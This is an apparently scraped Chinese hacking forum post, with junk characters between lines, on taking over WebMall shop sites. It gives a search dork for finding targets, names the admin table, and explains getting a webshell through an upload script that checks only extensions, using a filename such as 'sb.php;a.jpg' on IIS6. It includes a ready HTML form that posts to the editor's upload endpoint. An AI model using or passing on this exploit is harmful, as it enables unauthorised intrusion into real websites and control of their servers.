关键字:inurl:webmall/detail.php?id+ K. F+ P @! O
; L# I+ {$ q" ?$ p
数据表:pwn_base_admin
( ~3 x" e6 W4 }- _+ B8 ~; m: V2 n
2 A, B9 D' x5 ]6 `( F2 Y) C关于拿shell
( T! g% W/ K# _/ k. L' | & C# h; c; k% J! P: p6 v
首先登录后台admin.php
+ Q' v9 h* M3 h/ q* w b9 H . n: V3 I. `6 f' g) t$ `
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。4 i2 w7 b6 t5 F4 r: Y5 t; X T
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg. W! h! r# a( z" h' S5 P m5 h8 o, Q# Q
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的* \# o# Y3 T+ a2 M
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
9 A% x+ Y; g/ z$ @+ a! R& N<input type="text" name="fileName" value="sb.php;a.jpg" />
- o- R0 a5 a0 F5 \. a<input type="hidden" name="attachPath" value="news/pics/" />
$ D t' ?0 O E* u! a<input type="file" name="fileData" size="14" /></td> 6 w& |! c, W+ K- l: v' Q: y2 Q
<input type="submit" name="button" value="确定" />
; }9 k1 J. `4 [5 C</form>
7 J' f- r, M# v V+ q8 N
* y2 C8 S5 L! f' m首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。/ y* H* N2 C) } W2 M D/ @! [
" @4 ^0 x3 G$ a% m: b0 J
|